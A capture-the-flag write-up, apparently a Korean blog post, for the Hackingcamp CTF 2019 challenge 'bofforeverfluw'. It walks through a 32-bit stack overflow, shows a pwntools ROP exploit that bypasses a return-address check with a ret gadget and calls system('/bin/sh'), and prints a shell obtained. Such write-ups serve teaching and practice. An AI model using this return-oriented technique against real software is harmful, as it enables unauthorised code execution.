[Hackingcamp CTF 2019] bofforeverfluw
2019. 11. 27. 09:58ㆍWargame & CTF/Hackingcamp CTF
Summary
32bit
Analysis
// Hex-Rays decompilation of the challenge binary (i386; the checksec output further down shows
// no stack canary, NX enabled, no PIE). Two defects make it exploitable: an unbounded read() into
// a stack buffer, and a return-address "check" that rejects exactly one value.
int __cdecl main()
{
char buf; // [esp+0h] [ebp-204h] -- 0x204 bytes below the saved ebp, so the saved return address is 0x208 bytes past the start of buf
int (**retaddr)(const char *); // [esp+208h] [ebp+4h] -- the decompiler's name for the saved return-address slot itself
system("echo hi"); // prints "hi"; this call is also what gives the binary a PLT entry for system()
read(0, &buf, 0x800u); // reads up to 0x800 bytes with no bound: the stack overflow. Fix: bound the read to the buffer's real size and build with -fstack-protector
if ( retaddr == &system ) // only the one slot at [ebp+4] is compared against system's address; any other value passes, so this is not a mitigation
{
perror("no hack~"); // perror() appends strerror(errno) to the text; here it is just used as a message
exit(-1);
}
return 0;
}
retaddr(저장된 반환 주소)이 system인지 검사한다. 검사는 [ebp+4] 한 칸만 보므로, 그 자리에 ret 가젯을 두고 system은 그 다음 칸에 두면 우회된다. data 영역(0x0804a024)에 /bin/sh라는 문자열이 있다. 이것을 이용하면 된다.
Exploit
from pwn import *

# Exploit from the writeup for the Hackingcamp CTF 2019 "bofforeverfluw" binary (i386, no canary,
# no PIE). main() compares only the saved return slot against system(), so that slot gets a lone
# ret gadget and system() is reached one slot later, after the check has already passed.
elf = ELF("./bofforeverfluw")
io = process("./bofforeverfluw")

# Addresses are static because the binary is not PIE.
RET_GADGET = 0x0804851e  # presumably a single `ret`; occupies the slot main() inspects
POP_RET = 0x0804857b     # presumably a pop;ret gadget -- system()'s return address, discards the argument slot
BINSH = 0x0804a024       # "/bin/sh" string located in the data section
PAD_LEN = 0x204 + 0x4    # buf sits at ebp-0x204; the extra 4 bytes cover the saved ebp

io.recvuntil("hi\n")

chain = [
    "A" * PAD_LEN,
    p32(RET_GADGET),
    p32(elf.plt["system"]),
    p32(POP_RET),
    p32(BINSH),
]
io.send("".join(chain))
io.interactive()
cg10036@cg10036-virtual-machine:~/CTF/2019/HackingCampCTF/bofforeverfluw$ p ex.py
[*] '/home/cg10036/CTF/2019/HackingCampCTF/bofforeverfluw/bofforeverfluw'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './bofforeverfluw': pid 12419
[*] Switching to interactive mode
$ id
uid=1000(cg10036) gid=1000(cg10036) 그룹들=1000(cg10036),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)